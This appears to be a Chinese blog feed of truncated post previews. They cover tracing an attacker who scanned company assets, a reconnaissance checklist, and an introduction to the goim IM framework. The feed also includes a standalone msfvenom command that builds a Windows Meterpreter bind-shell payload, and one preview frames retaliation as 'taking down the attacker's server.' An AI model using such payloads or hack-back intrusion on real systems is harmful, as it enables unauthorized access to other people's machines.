分享工作之外有用的事情。一、流量监测流量中发现有IP持续在对公司资产进行攻击。初步判断是有人使用扫描器在对公司资产进行攻击。二、溯源信息为了能找到更多攻击者的信息，首选是拿下攻击者的服务器。我听取了大神的建议，使用goby进行初步的扫描，不用不知道，一用吓一跳。这里吹一波goby，基于go内核，速度和效率有保证，UI优雅，采用 Electron+VUE 前端框架，跨平台，从扫描到打漏洞库，乃至生成

听大佬说过一次又一次关于信息收集的重要性，但是自己在实操的时候，总是有些迷茫。于是就有了这篇文章，将信息收集的步骤和工具列出来，方便以后实操时按照此流程走下去，慢慢地养成科学、高效的信息收集习惯我理解的信息收集内容：资产认证+子域名+子域名的子域名+旁站+C段+网页蜘蛛爬虫+指纹识别+github信息泄露+内容敏感信息泄露(google语法)一、资产认证这是我自己创造的词，什么叫资产认证...

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

阅读开源作品，是快速提升自身水平的最好方式之一。好的开源作品浓缩了高手的智慧和高超的编程技巧和思想，长期阅读会让这些珍贵的经验和技巧不知不觉回馈到我们的日常工作中。所以，阅读开源作品是必须掌握的一项技能。本人会在此篇开始逐渐记录阅读的点点滴滴，分享给读者朋友，和我一起进步！GOIM简介goim是bilibili公司技术总监毛剑创作，用于B站生产线上的IM服务框架，其框架原理图如下，有兴趣的...